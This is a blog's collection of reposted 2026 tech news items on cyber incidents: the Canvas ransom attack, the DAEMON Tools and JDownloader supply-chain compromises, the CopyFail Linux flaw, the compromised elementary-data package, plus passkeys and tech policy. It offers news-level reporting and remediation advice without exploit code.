The hacking group ShinyHunters claimed responsibility for the attack, which caused the academic software Canvas used by thousands of schools and universities to go offline this week.

By late Thursday, the company Instructure, which owns Canvas, posted an update on its website saying that Canvas was "available for most users", but some universities were still reporting outages on Friday.

The cyber attacks targeted universities and schools across the globe, affecting an estimated 9,000 institutions.

A ransom note demanding payment in bitcoin appeared on screens during a cyber-hacking incident on the cloud-based platform Canva. 

Mississippi State University announced that it was postponing Friday's final exams to allow affected students to recover any lost work.

Aubrey Palmer, a meteorology student at the university, told the BBC students had just finished a 2,900-word exam essay when a ransom note suddenly appeared on their screens.

The message read: "Shiny Hunters has breached Instructure (again)."

It threatened to release stolen data unless Canvas or the affected universities paid a ransom in bitcoin.

"My knee‑jerk reaction was that I'd been hacked myself, because that's what it looked like," Palmer said. "But then I actually read the ransom note and saw it was Canvas that had been hacked."

Palmer said the professor and dozens of other students all had the note and everyone was looking around the room in confusion.

At first, it was unclear whether their work had been saved.

Frustration quickly spread among the students, and Palmer said people became "so angry at the idea of having to redo" their exams.

The university has since been updating students by email, rescheduling exams, and advising them to ignore suspicious messages while responding to what it described as a "nationwide security incident".

The University of Sydney told students on Friday "Canvas was unavailable" and instructed students not to attempt to log in.

"We are one of approximately 9000 institutions around the world that are impacted by this outage, and we are still waiting for advice from Instructure," the university wrote on its website.

The outage affected students' coursework and examinations, the university said, acknowledging "how disruptive this is at a critical time in the semester".

On Thursday, Idaho State University said it had cancelled exams scheduled after 12:00 local time (18:00 GMT).

Penn State University wrote in a message to students on Thursday that "no one has access" to Canvas, adding that a "resolution" was unlikely to arrive "within the next 24 hours". The university cancelled some exams scheduled for Thursday and Friday.

In an update on Thursday evening, the University of British Columbia in Vancouver informed students that Canvas was "unavailable due to a cyber breach of its parent company Instructure", and advised them to log out immediately.

The University of Toronto also reported it was impacted by the breach, saying that "multiple universities were affected".

Students at the University of California Los Angeles struggled to submit assignments online through the Canvas platform, and the University of Chicago, in Illinois, temporarily disabled its Canvas page after reports that it was targeted.

The Chicago Maroon, the university-led newspaper, posted a screenshot of a message from ShinyHunters that appeared to be seeking a ransom.

The message encouraged the university to contact the hacking group privately "to negotiate a settlement" and avoiding "the release of their data".

It was the same message that Northwestern University masters student Jacques Abou-Rizk said he received when he clicked a link in an email that appeared to be from a university administrator.

"I didn't know what was happening," Abou-Rizk recalled. "It's a scary message to receive."

He said the university addressed the issue on Thursday, sending a generic email, seen by the BBC, that said Northwestern was "monitoring an issue".

The email stated the university did not have an estimated restoration time for Canvas and that other IT infrastructure had not been affected.

Abou-Rizk said he was still unable to access Canvas on Friday and has not heard from the university since.

"There's definitely anxiety surrounding not only being able to complete my work and access the sites that I need access to on Canvas," Abou-Rizk said. "But also just not knowing exactly what the threat is and how it might affect me.

"I don't know what data will be released, and that scares me."

The BBC has contacted Northwestern University for comment.

ShinyHunters has been linked to several high‑profile cyber attacks in the past, including a major and economically damaging hack on Jaguar Land Rover last year.

Screen shots show the targeted threats from the group began on Sunday, with deadlines given on Thursday and 12 May, Luke Connolly, a threat analyst at the cyber security firm Emisoft, told the Associated Press.

He said discussions regarding extortion payments could be ongoing.

The group would not say what it plans to do with the data it claims to have taken during the latest attack.

Cyber attacks on Thursday came the same day that the top US Senate Democrat, Chuck Schumer, sent a letter to the Trump administration urging for more defence against cyber risks in the age of rapidly developing AI.

The Department of Homeland Security - the agency that helps ward off against cyber attacks - "must immediately help states and localities", Schumer wrote.

"Before Americans are hit with outages, disruptions, and attacks that could put lives and livelihoods at risk," he continued. 

Source

On World Password Day, the first Thursday of May, Microsoft published a blog post detailing the importance of shifting from traditional passwords to passkeys as security becomes more important amid more advanced attacks using AI and other sophisticated techniques.

In a new security blog post, the company says passkeys are becoming increasingly important. According to Microsoft, passwords remain one of the weakest links in online security. With credential leaks and phishing attacks, Microsoft argues that users should ditch traditional passwords and switch to passkeys.

Microsoft is already a major passkey proponent. Earlier this year, the company announced that new Microsoft accounts are now passwordless by default, allowing users to sign in with passkeys, biometrics, or security keys instead of traditional passwords. Existing users can also remove passwords from their accounts manually. Additionally, Windows 11 now has better passkey integration, which allows it to use passkeys stored in third-party managers like 1Password or Bitwarden. Microsoft will also let you sync passkeys from Microsoft Password Manager to iOS and Android via the Edge browser.

Passkeys offer a simpler and more secure authentication method because they rely on device-based verification, such as fingerprints, facial recognition, or PINs. Unlike passwords, passkeys are resistant to phishing attacks and cannot be easily stolen through fake login pages.

Microsoft is not alone in this effort either. The wider tech industry, including members of the FIDO Alliance, has been heavily promoting passkey adoption over the last year as part of a broader push toward passwordless authentication. As such, the FIDO Alliance estimates that 5 billion passkeys are already in use worldwide. Microsoft adds that "hundreds of millions of users" have already switched to passkeys for OneDrive, Xbox, and other Microsoft-made consumer services. The company itself switched its environment to passkeys:

Inside Microsoft, we’ve eliminated weaker authentication methods and rolled out phishing-resistant authentication, covering 99.6% of users and devices in our environment. It’s made signing in a lot simpler: no codes to enter, no extra prompts to manage, just a straightforward experience for everyone.

Microsoft also wants to make sure bad actors cannot phish out your account recovery data. Starting January 2027, security questions will no longer be able to reset Microsoft Entra ID passwords.

You can read more about the company's password-less efforts in a post on the official blog.

Source

Hope you enjoyed this news post. Feedback welcome.

Posted Saturday 9 May 2026 at 7:15 am AEST (my time).

News posts: 2023 5,800+ | 2024 5,700+ | 2025 5,700+ | 2026 (to end of April) 1,700

RIP Matrix

The website for the popular download manager, JDownloader, has been compromised by attackers who spent over a day serving malicious installers to Windows and Linux users, replacing the legitimate download files with malware.

The JDownloader team first confirmed the hack yesterday and immediately took down the website for a full investigation. The action came after a user on Reddit reported that fresh downloads were being flagged by Windows SmartScreen and listed a suspicious publisher, as one "Zipline LLC", instead of the expected "AppWork" signature. The user's post quickly gained traction and prompted a developer from the team to step in and confirm the breach.

The JDownloader team said that its initial investigation confirmed a limited but serious breach. The attackers specifically modified the alternative download page on May 6. They replaced all the alternative Windows installer links with their own malicious, unsigned executables.

The Linux shell installer was also swapped with a version containing malicious shell code. However, the team was quick to reassure users that the main JDownloader.jar file, macOS installers, and packages from repositories like Winget, Flatpak, and Snap were never compromised. Those packages rely on separate infrastructure secured with checksums, and in-app updates are protected by end-to-end digital signatures.

The attackers were able to gain access thanks to an "unpatched" security bug on the website. This flaw lets them alter the site's Access Control Lists without needing to be authenticated. After giving themselves edit rights, they simply replaced the official download links with their own. Reports from users who ran the infected files are pretty grim, with some stating the malware disabled Windows Defender entirely.

JDownloader is the latest victim of a supply chain-style attack using the popularity of a trusted utility to deliver malware. Just last month, hackers breached the official website for CPUID (the maker of the popular hardware diagnostic tools CPU-Z and HWMonitor) and served a deceptively named file (HWiNFO_Monitor_Setup.exe) that tripped Windows Defender.

For CPU-Z, the hackers bundled a malicious, Zig-compiled file named CRYPTBASE.dll with the otherwise clean CPU-Z application, so that when you run it, the program unknowingly loads the fake, malicious DLL file into its memory space first. After a Reddit user raised the alarm, CPUID quickly took down the website, patched the API vulnerability, and restored the clean download links.

Source

"Within less than 12 hours of identifying the issue, we were able to implement a solution. Based on our current findings, the issue was limited to the free DAEMON Tools Lite version and did not affect any of our other products," Disc Soft told BleepingComputer.

"We have not identified evidence supporting claims that all DAEMON Tools users were impacted, and at this stage, we are not in a position to confirm any impact on paid versions customers. Our current analysis indicates that DAEMON Tools Pro and DAEMON Tools Ultra were not affected and absolutely safe."

In a separate statement published earlier today, Disc Soft also said it has secured its infrastructure. Still, it has yet to attribute the attack to a specific threat actor or share additional information about the breach, including the attack vector used to access its systems, as it continues to investigate the incident.

"Following an internal investigation, we identified unauthorized interference within our infrastructure. As a result, certain installation packages were impacted within our build environment and were released in a compromised state. Version 12.6 of DAEMON Tools Lite, which does not contain the suspected compromised files, was released on May 5." the company said.

"Users of other DAEMON Tools products, including paid versions of DAEMON Tools Lite, DAEMON Tools Ultra, and DAEMON Tools Pro are not affected by this incident and can continue using their software as usual."

Users who downloaded or installed DAEMON Tools Lite version 12.5.1 (free) since April 8 are advised to uninstall the app, run a full system scan using security or antivirus software, and install the latest version of DAEMON Tools Lite (12.6) from the official website.

Disc Soft has removed the trojanized version, which is no longer supported, and now displays a warning prompting users to install the latest version of DAEMON Tools Lite.

As cybersecurity company Kaspersky revealed on Tuesday, hackers trojanized DAEMON Tools Lite installers and used them to backdoor thousands of systems from more than 100 countries that downloaded the software from the official website since April 8.

After the unsuspecting users executed the digitally signed trojanized installers (versions ranging from 12.5.0.2421 to 12.5.0.2434), the malicious code embedded in the compromised binaries deployed a payload designed to establish persistence and activate a backdoor on system startup.

The first-stage malware dropped in the attack was a basic information stealer that collected system data (including hostname, MAC address, running processes, installed software, and system locale) and sent it to attacker-controlled servers for victim profiling. Based on the results, some of the infected systems received a second stage, a lightweight backdoor that can execute commands, download files, and run code directly in memory.

In at least one case, Kaspersky observed the deployment of a QUIC RAT malware, which can inject malicious code into legitimate processes and supports multiple communication protocols.

While investigating the attack, Kaspersky found that retail, scientific, government, and manufacturing organizations in Russia, Belarus, and Thailand, as well as home users in Russia, Brazil, Turkey, Spain, Germany, France, Italy, and China, were among the victims whose devices were infected with malicious payloads.

Today, in an update to the original report, the Russian cybersecurity company confirmed that DAEMON Tools Lite 12.6.0, released yesterday, no longer exhibits malicious behavior.

"Following disclosure, the vendor acknowledged the issue and published a new version of the software to address it," Kaspersky said. "The updated DAEMON Tools version 12.6.0.2445 no longer shows the malicious behavior."

Update May 06, 14:09 EDT: Added Disc Soft statement.

Source

Hope you enjoyed this news post. Feedback welcome.

Posted Thursday 7 May 2026 at 6:59 am AEST (my time).

News posts: 2023 5,800+ | 2024 5,700+ | 2025 5,700+ | 2026 (to end of April) 1,700

RIP Matrix

A major supply chain attack targeting the widely used disk imaging software DAEMON Tools has been uncovered, with malicious installers distributed through official channels since early April 2026. According to findings published by Kaspersky, attackers compromised legitimate installers and embedded backdoors into signed binaries, allowing malware to be delivered under the guise of trusted software updates.

The campaign began on April 8, 2026, when multiple versions of DAEMON Tools (12.5.0.2421 to 12.5.0.2434) were trojanised. The infected installers were hosted on the software’s official website and signed using valid digital certificates belonging to developer AVB Disc Soft. This made the malicious packages appear authentic, significantly increasing the likelihood of successful infection. Researchers say the attack remains active as of early May, with infrastructure still operational.

Several core binaries, including DTHelper.exe, DiscSoftBusServiceLite.exe, and DTShellHlp.exe, were modified to include a hidden backdoor. Once installed, these components execute automatically at system startup and establish communication with an external command-and-control server. The attackers also used a domain designed to resemble legitimate DAEMON Tools website, further blending malicious activity with normal traffic. The malicious domain was registered just days before the campaign began, suggesting a carefully planned operation.

The attack follows a staged structure. In most cases, infected systems first receive an information-stealing payload that gathers system data such as MAC addresses, hostnames, installed software, running processes, network configuration, and system locale. This information is then sent to attacker-controlled servers and is likely used to profile compromised systems and assess their value for further exploitation. Interestingly, parts of this payload contain Chinese-language strings, hinting at a possible Chinese-speaking threat actor; however, no formal attribution has been made.

Despite thousands of infections observed globally, only a small subset of infected machines received additional malware beyond the initial payload. These higher-value targets were associated with organisations operating in the government, manufacturing, scientific research, and retail sectors. The selective nature of this deployment suggests that the operation was not purely opportunistic, but instead involved targeted objectives consistent with espionage or strategic intrusion activity.

Among the second-stage tools identified was a minimalistic backdoor capable of executing commands, downloading files, and running code directly in memory. In at least one confirmed case, a more advanced implant known as QUIC RAT was deployed. This malware supports multiple communication protocols, including HTTP, TCP, DNS, and QUIC, and can inject code into legitimate processes such as notepad.exe.

Telemetry data shows thousands of infection attempts across more than 100 countries. The highest number of affected systems was recorded in Russia, Brazil, Turkey, Spain, Germany, France, Italy, and China. Around ten percent of affected systems belonged to organisations, while most systems only received the initial data-collection stage.

Security tools from Kaspersky reportedly detect the malicious activity at multiple stages, including suspicious PowerShell-based downloads, malware execution from temporary directories, code injection into legitimate processes, and unusual outbound network traffic.

Organisations are advised to carry out audits of systems where DAEMON Tools was installed after 8 April 2026. It is also recommended to monitor systems for unusual command-line activity, particularly involving PowerShell. In addition, organisations are encouraged to implement zero-trust security models and restrict execution from temporary directories.

The DAEMON Tools compromise demonstrates how attackers continue to refine supply chain tactics, combining large-scale distribution with precise targeting. With trusted software increasingly becoming an entry point for advanced threats, organisations must treat even legitimate applications as potential risk vectors and adopt layered, proactive defence strategies.

Source

A cybersecurity researcher has released a proof-of-concept (PoC) tool highlighting how saved passwords are handled in Microsoft Edge. The researcher, known online as Tom Jøran Sønstebyseter Rønning, shared his findings on social media handles like X alongside a working demonstration.

According to the post, Microsoft Edge loads saved user credentials into system memory in plaintext at startup, even when those credentials are not actively in use. And the browser still asks you to log in again while it holds all the passwords unprotected in RAM.

To explain the behavior, the researcher published a tool on GitHub titled “EdgeSavedPasswordsDumper.” The project is described as an educational utility designed to help security professionals and users verify how stored credentials are managed within the browser environment. The tool works by accessing the browser’s process memory, where usernames and passwords may be stored in readable form.

According to the researcher’s observations, the parent process of Microsoft Edge consistently holds decrypted credentials, making it a potential target for extraction if an attacker gains sufficient system privileges. Organisations running shared or multi-user systems may be particularly affected, as a compromised account with administrative privileges could access data from multiple active sessions.

While the technique does not represent a remote exploit on its own, it could become relevant in scenarios where an attacker already has elevated access to a system. In such cases, memory-dumping techniques like using common administrative tools could potentially expose stored login information.

Interestingly, the issue appears to be specific to Edge among Chromium-based browsers as during testing, the researcher reported that alternatives such as Google Chrome and Brave did not exhibit the same behavior. The latter do it better by typically decrypting credentials only when needed rather than storing them persistently in memory. However, that's not to say that Chrome is flawless as we recently covered fingerpriting protection, something which Google's browser lacks.

Bizarrely, perhaps, Microsoft has apparently categorized this behavior as “by design,” when the researcher tried to inform the company about the issue. Nothing beyond that was seemingly said by Microsoft.

Thanks for the tip, Aryeh Goretsky!!!

Source

Hope you enjoyed this news post. Feedback welcome.

Posted Wednesday 6 May 2026 at 7:39 am AEST (my time).

News posts: 2023 5,800+ | 2024 5,700+ | 2025 5,700+ | 2026 (to end of April) 1,700

RIP Matrix

Daemon Tools, a widely used app for mounting disk images, has been backdoored in a monthlong compromise that has pushed malicious updates from the servers of its developer, researchers said Tuesday.

Kaspersky, the security firm reporting the supply-chain attack, said it began on April 8 and remained active as of the time its post went live. Installers that are signed by the developer’s official digital certificate and downloaded from its website infect Daemon Tools executables, causing the malware to run at boot time. Kaspersky didn’t explicitly say so, but based on technical details, the infected versions appear to be only those that run on Windows. Versions 12.5.0.2421 through 12.5.0.2434 are affected. Neither Kaspersky nor developer AVB could be contacted immediately for additional details.

Hard to defend against

Infected versions contain an initial payload that collects MAC addresses, hostnames, DNS domain names, running processes, installed software, and system locales. The malware sends them to an attacker-controlled server. Thousands of machines in more than 100 countries were targeted. Out of the many machines infected, about 12 of them, belonging to retail, scientific, government, and manufacturing organizations, have received a follow-on payload—an indication that the supply-chain attack targets select groups.

The incident is only the latest supply-chain attack. Other such attacks include the poisoning of the CCleaner Windows utility in 2017, the Solar Winds app management software for enterprises in 2020, and 3CX VoIP client in 2023. Such attacks are hard to defend against because users are infected when they do nothing more than install digitally signed updates available through official channels. In all three cases it took weeks or months before the compromised update distribution channels were discovered.

“Based on our long-term experience of analyzing supply chain attacks, we can conclude that attackers orchestrated the DAEMON Tools compromise in a highly sophisticated manner,” Kaspersky researchers wrote. “For example, the time it took to detect this attack, which turned out to be about one month, is comparable to the 3CX supply chain attack which we researched together with the cybersecurity community in 2023. Given the high complexity of the attack, it is paramount for organizations to carefully examine machines that had DAEMON Tools installed, for abnormal cybersecurity-related activities that occurred on or after April 8.”

One of the follow-on payloads pushed to about a dozen organizations was what Kaspersky described as a “minimalistic backdoor.” It has the ability to execute commands, download files, and run shellcode payloads in memory—making the infection harder to detect.

Kaspersky said that it observed a more complex backdoor dubbed QUIC RAT, installed on a single machine belonging to an educational institution located in Russia. Initial analysis found that it can inject payloads into the notepad.exe and conhost.exe processes and supports a variety of C2 communication protocols, including HTTP, UDP, TCP, WSS, QUIC, DNS, and HTTP/3.

The 100 infected organizations were primarily located in Russia, Brazil, Turkey, Spain, Germany, France, Italy, and China. Kaspersky’s visibility into the attack is limited because it’s based solely on telemetry provided by its own products.

Kaspersky researchers wrote:

The analysis shows that 10% of the affected systems belong to businesses and organizations. Attackers attempted to infect most of the affected machines only with the information collector payload. However, the other backdoor payload, which is more complex, has been observed only on a dozen machines of government, scientific, manufacturing and retail organizations located in Russia, Belarus and Thailand. This manner of deploying the backdoor to a small subset of infected machines clearly indicates that the attacker had intentions to conduct the infection in a targeted manner. However, their intent – whether it is cyberespionage or ‘big game hunting’ – is currently unclear.

More recent supply-chain attacks have hit Trivy, Checkmarx, and Bitwarden and more than 150 packages available through open source repositories. Last year, there were at least six notable such attacks.

Anyone who uses Daemon Tools should take time to scan the entirety of their machines using reputable antivirus software. Windows users should additionally check for indicators of compromise listed in the Kaspersky post. For more technically advanced users, Kaspersky recommends monitoring “suspicious code injections into legitimate system processes, especially when the source is executables launched from publicly accessible directories such as Temp, AppData, or Public.”

Source

Hope you enjoyed this news post. Feedback welcome.

Posted Wednesday 6 May 2026 at 7:38 am AEST (my time).

News posts: 2023 5,800+ | 2024 5,700+ | 2025 5,700+ | 2026 (to end of April) 1,700

RIP Matrix

The top reward of $1.5 million is reserved for zero-click Pixel Titan M2 security chip full-chain exploits with persistence, the most technically demanding attack scenario in the program, while the same exploits, but without persistence, are also eligible for up to $750,000.

On the Google Chrome side, full-chain browser process exploits on up-to-date operating systems and hardware now come with rewards of up to $250,000, plus an additional $250,128 bonus for successfully exploiting MiraclePtr-protected memory allocations.

"We know that certain particularly impactful exploits remain incredibly difficult to achieve and we've greatly appreciated collaborating with the researcher community to discover and unearth them," Google said.

"We want to build on this partnership by continuing to emphasize the highest tiers of rewards across both Android and Chrome."

For the Chrome program, Google shifts its focus to concise reports containing only bug proofs and essential artifacts, rather than lengthy written analyses that AI can now generate automatically.

The Android program will also narrow its focus to Linux kernel vulnerabilities in Google-maintained components, unless researchers can demonstrate concrete exploitability on Android devices.

"While AI has made it effortless to produce lengthy, detailed write-ups, our internal tooling has also evolved to help us automatically explain and suggest fixes for bugs," the company added.

This vulnerability rewards program restructuring follows a record year for Google's bug bounty effort, with the company paying $17.1 million to 747 researchers in 2025, a more than 40 percent increase from 2024 and an all-time high.

This has brought the total payouts since the program launched in 2010 to more than $81.6 million, and Google estimates that the total aggregate rewards paid in 2026 will increase despite reductions in some individual reward amounts.

Source

Hope you enjoyed this news post. Feedback welcome.

Posted Wednesday 6 May 2026 at 7:37 am AEST (my time).

News posts: 2023 5,800+ | 2024 5,700+ | 2025 5,700+ | 2026 (to end of April) 1,700

RIP Matrix

A wave of recent alerts from Microsoft Defender identifying a threat labeled “Cerdigent” on Windows systems is drawing the attention of users and security researchers worldwide, with early evidence suggesting the detections may be tied to the abuse of mis-issued digital certificates rather than a real malware campaign.

According to a report filed in Mozilla’s Bugzilla tracking system, the root of the issue lies in a security incident involving certificate authority DigiCert. The report suggests that a threat actor gained limited access to DigiCert’s internal support systems after compromising a support analyst’s machine. This access allowed the attacker to get initialisation codes for "a limited number of code signing certificates."

These codes, when combined with approved orders, were sufficient to generate legitimate code-signing certificates that were used to sign software so that they appear trustworthy to operating systems like Windows and anti-virus products like Defender.

DigiCert investigated and found and revoked 60 certificates as they were being used by the Zhong stealer malware. In its full incident report on Bugzilla DigiCert explained: "During our investigation between 2026-04-14 and 2026-04-17, as DigiCert identified certificates potentially affected by the threat actor's actions, we revoked them. DigiCert revoked 60 certificates issued from the following CAs:

• DigiCert Trusted G4 Code Signing RSA4096 SHA256 2021 CA1
• DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1
• GoGetSSL G4 CS RSA4096 SHA256 2022 CA-1
• Verokey High Assurance Secure Code EV

27 of the revoked certificates were explicitly linked to the threat actor (11 were identified in certificate problem reports provided to DigiCert by community members linking the certificates to malware, and 16 were identified during our own investigation). ... In addition to the 27 identified above, 33 of the 60 total certificates were revoked during our own investigation as a precautionary measure. ... The exploited certificates identified by the community member were found to have been used to sign the "Zhong Stealer" malware family."

Thus for now, available information suggests that many Cerdigent alerts may not indicate active infection but a false alarm. Microsoft's own threat database does not say much about it except that "Cerdigent.A!dha can perform a number of actions of a malicious actor's choice on your device."

Since code-signing certificates play a key role in the trust model of modern operating systems, when compromised, they can blur the line between legit and malicious software. If you are encountering such warnings then you are advised to monitor updates from security vendors, as signature corrections are often issued quickly in cases of widespread false positives, which seems to be case here too.

Source: Bugzilla@Mozilla

Thanks for the tip, Aryeh Goretsky!!!

Source

Hope you enjoyed this news post. Feedback welcome.

Posted Monday 4 May 2026 at 7:26 am AEST (my time).

News posts: 2023 5,800+ | 2024 5,700+ | 2025 5,700+ | 2026 (to end of April) 1,700

RIP Matrix

Publicly released exploit code for an effectively unpatched vulnerability that gives root access to virtually all releases of Linux is setting off alarm bells as defenders scramble to ward off severe compromises inside data centers and on personal devices.

The vulnerability and exploit code that exploits it were released Wednesday evening by researchers from security firm Theori, five weeks after privately disclosing it to the Linux kernel security team. The team patched the vulnerability in versions 7.0, 6.19.12, 6.18.12, 6.12.85, 6.6.137, 6.1.170, 5.15.204, and 5.10.254) but few of the Linux distributions had incorporated those fixes at the time the exploit was released.

A single script hacks all distros

The critical flaw, tracked as CVE-2026-31431 and the name CopyFail, is a local privilege escalation, a vulnerability class that allows unprivileged users to elevate themselves to administrators. CopyFail is particularly severe because it can be exploited with a single piece of exploit code—released in Wednesday’s disclosure—that works across all vulnerable distributions with no modification. With that, an attacker can, among other things, hack multi-tenant systems, break out of containers based on Kubernetes or other frameworks, and create malicious pull requests that pipe the exploit code through CI/CD work flows.

“‘Local privilege escalation’ sounds dry, so let me unpack it,” researcher Jorijn Schrijvershof wrote Thursday. “It means: an attacker who already has some way to run code on the machine, even as the most boring unprivileged user, can promote themselves to root. From there they can read every file, install backdoors, watch every process, and pivot to other systems.”

Schrijvershof added that the same Python script Theori released works reliably for Ubuntu 22.04, Amazon Linux 2023, SUSE 15.6, and Debian 12. The researcher continued:

Why does that matter on shared infrastructure? Because “local” covers a lot of ground in 2026: every container on a shared Kubernetes node, every tenant on a shared hosting box, every CI/CD job that runs untrusted pull-request code, every WSL2 instance on a Windows laptop, every containerised AI agent given shell access. They all share one Linux kernel with their neighbours. A kernel LPE collapses that boundary.

 

The realistic threat chain looks like this. An attacker exploits a known WordPress plugin vulnerability and gets shell access as www-data. They run the copy.fail PoC. They are now root on the host. Every other tenant is suddenly reachable, in the way I walked through in this hack post-mortem. The vulnerability does not get the attacker onto the box; it changes what happens in the next ten seconds after they land there.

The vulnerability stems from a “straight-line” logic flaw in the kernel’s crypto API. Many exploits exploiting race conditions and memory corruption flaws don’t consistently succeed across kernel versions or distributions, and sometimes even on the same machine. Because the code released for CopyFail exploits a logic flaw, “reliability isn’t probabilistic, and the same script works across distributions, researchers from Bugcrowd wrote. “No race window, no kernel offset.”

CopyFail gets its name because the authencesn AEAD template process (used for IPsec extended sequence numbers) doesn’t actually copy data when it should. Instead, it “uses the caller’s destination buffer as a scratch pad, scribbles 4 bytes past the legitimate output region, and never restores them,” Theori said. “The ‘copy’ of the AAD ESN bytes ‘fails’ to stay inside the destination buffer.”

The worst Linux vulnerability in years

Other security experts echoed the perspective that CopyFail poses a serious threat, with one saying it’s the “worst make-me-root vulnerabilities in the kernel in recent times.”

The most recent such Linux vulnerability was Dirty Pipe from 2022 and Dirty Cow in 2016. Both of those vulnerabilities were actively exploited in the wild.

Linux distributors frequently stick with older kernel versions and backport fixes into them. There’s no indication in the disclosure deadline that Theori ever contacted the distributors. With the exploit available before fixed distributions were available, the disclosure amounts to something very similar to a zero-day vulnerability being dropped, although the stiffer term is probably “zero-day patch gap.”

“The org doing the disclosure… did an absolutely terrible job of vulnerability coordination,” Will Dormann, a senior principal vulnerability analyst at Tharros Labs, said in an interview. “What is mind boggling to me is that in their writeup they both: A) list 4 affected vendors, and tell readers to apply vendor patches. But before firing away with the publication, they didn’t bother to see if ANY of the vendors that they list ACTUALLY HAVE PATCHES. (None do).”

Theori representatives did not respond when asked to comment.

Distributions known to have patched the vulnerability included Arch Linux and RedHat Fedora. Those known to have released mitigation guidance at the time this post went live include:

• SUSE
• RedHat
• Ubuntu

People seeking the status of other distributions should check with the respective vendors.

Theori said that it discovered the vulnerability after its researcher, Taeyang Lee, found surface area in the crypto subsystem (specifically, splice() hands page-cache pages and scatterlist page provenance) had been underexplored. Using its AI-powered Xint code security tool, the researchers then found the bug after about an hour of scan time. The company said it has also developed an exploit that uses CopyFail to break out of Kubernetes containers.

The severity of the threat posed by CopyFail and the likelihood of active exploitation is high enough to warrant all Linux users to investigate their systems immediately. Individual distributors provide useful mitigation guidance, as does the post by Schrijvershof linked above.

Source

Hope you enjoyed this news post. Feedback welcome.

Posted Friday 1 May 2026 at 12:12 pm AEST (my time).

News posts: 2023 5,800+ | 2024 5,700+ | 2025 5,700+ | 2026 (to end of April) 1,700

RIP Matrix

The digital liberties organization, Open Rights Group, has warned that the UK government is risking the creation of a system of digital checkpoints. The warning comes after MPs backed the Children and Schools Wellbeing Bill that seeks to expand age identification across online platforms, rather than just to prevent access to adult content.

ORG said that as age identification expands, millions more people will have to hand over personal data to access everyday services. Concerns center on weak safeguards for user data, data reuse, and the possibility of fraud if user data is stolen. Just this week, medical information of over 500,000 participants of the UK Biobank science programme was found for sale on China’s Alibaba–and it’s not the only incident of data loss related to the UK government.

James Baker, Platform Power Programme Manager at ORG, said that in less than a year, the UK has gone from checking IDs for porn to the prospect of checking ID to access social media or unlock features such as livestreams or algorithmic feeds. He also pointed to this news story showing that government-mandated social media bans like those seen in Australia are being sidestepped with face masks and their parents’ ID.

Another worry held by groups like ORG is that children will start using more seedy platforms that don’t enforce checks and potentially connect children and pedophiles in unregulated chats. This is the type of argument we’ve heard peddled by Big Tech, which says it already has safeguards in place.

After a decade and a half of social media companies basically doing whatever they want with little oversight, and the negative social consequences this has caused such as radicalization, mental health crises, and child exploitation, it is extremely unlikely that the UK government, or any other for that matter, are going to seriously consider this view. In fact, many governments globally are now taking much tougher action against Big Tech after some countries have shown it can be done.

Source

Hope you enjoyed this news post. Feedback welcome.

Posted Wednesday 29 April 2026 at 5:25 pm AEST (my time).

News posts: 2023 5,800+ | 2024 5,700+ | 2025 5,700+ | 2026 (to end of March) 1,297

RIP Matrix

The Australian government has introduced a new bill that would require Google, Meta, and TikTok to pay fees to local news outlets for content that appears on their platforms. The bill is intended to support local media and journalism in the country.

The News Bargaining Incentive, first initiated in 2024, aims to end tech companies’ free use of news produced by local media outlets and ensure they pay for the content that fuels their platforms. Companies that fail to reach agreements with local news organizations could face fines of up to 2.25% of their local revenue, which could amount to millions of dollars.

"People are increasingly getting their news directly from Facebook, from TikTok and from Google, and we believe it's only fair that large digital platforms contribute to the hard work of journalism that enriches their feeds and that drives their revenue," Australia Communications Minister Anika Wells said.

Wells also suggested that tech firms strike deals with news outlets; otherwise, they may have to pay higher fines. The proposed levy would take effect on July 1. It would also apply to companies that hold a significant share of Australia's online search market and generate up to A$250 million ($179.3 million) in local revenue. The bill does not include artificial intelligence platforms, but it does apply to companies such as Google, Meta, and TikTok.

Executives from some of Australia’s largest media outlets called the latest initiative a “critical step toward securing the future of Australian news,” adding that “If digital platforms fail to pay for the use of the news content from which they profit, then journalism becomes unsustainable.”

Australia is not the first country to try to make tech firms pay for the news they use on their platforms. Google previously paid nearly $100 million to Canadian news outlets to be exempt from the Online News Act.

Via: Reuters

Source

Hope you enjoyed this news post. Feedback welcome.

Posted Wednesday 29 April 2026 at 7:28 am AEST (my time).

News posts: 2023 5,800+ | 2024 5,700+ | 2025 5,700+ | 2026 (to end of March) 1,297

RIP Matrix

Open source software with more than 1 million monthly downloads was compromised after a threat actor exploited a vulnerability in the developers’ account workflow that gave access to its signing keys and other sensitive information.

On Friday, unknown attackers exploited the vulnerability to push a new version of element-data, a command-line interface that helps users monitor performance and anomalies in machine-learning systems. When run, the malicious package scoured systems for sensitive data, including user profiles, warehouse credentials, cloud provider keys, API tokens, and SSH keys, developers said. The malicious version was tagged as 0.23.3 and was published to the developers’ Python Package Index and Docker image accounts. It was removed about 12 hours later, on Saturday. Elementary Cloud, the Elementary dbt package, and all other CLI versions weren’t affected.

Assume compromise

“Users who installed 0.23.3, or who pulled and ran the affected Docker image, should assume that any credentials accessible to the environment where it ran may have been exposed,” the developers wrote.

The threat actor gained access to the developers’ account by exploiting a vulnerability in a GitHub action they created. By posting malicious code to a pull request, the attackers were able to run a bash script that ran inside the developer’s account. The bash script retrieved the sensitive data. With the account tokens and signing keys, the attacker went on to publish a malicious element-data package that was nearly indistinguishable from a legitimate one.

The developers learned of the compromise from a third-party issue report. Within three hours, the package was removed. Element developers said they also rotated all credentials that the malicious code had access to. They have further fixed the vulnerability and audited all their other GitHub actions to ensure none contain the same flaw.

The developers are urging all developers who installed version 0.23.3 to take the following steps immediately:

1. Check your installed version:

 

pip show elementary-data | grep Version

 

2. If the version is 0.23.3, uninstall it and replace it with the safe version:

 

pip uninstall elementary-data

 

pip install elementary-data==0.23.4

 

In your requirements and lockfiles, pin explicitly to elementary-data==0.23.4.

 

3. Delete your cache files to avoid any artifacts.

 

4. Check for the malware’s marker file on any machine where the CLI may have run: If this file is present, the payload executed on that machine.

 

macOS / Linux: /tmp/.trinny-security-update

 

Windows: %TEMP%\\.trinny-security-update

 

5. Rotate any credentials that were accessible from the environment where 0.23.3 ran – dbt profiles, warehouse credentials, cloud provider keys, API tokens, SSH keys, and the contents of any .env files. CI/CD runners are especially exposed because they typically have broad sets of secrets mounted at runtime.

 

6. Contact your security team to hunt for unauthorized usage of exposed credentials. The relevant IOCs are at the bottom of this post.

Over the past decade, supply-chain attacks on open source repositories have become increasingly common. In some cases, they have achieved a chain of compromises as the malicious package leads to breaches of users and, from there, breaches resulting from the compromise of the users’ environments.

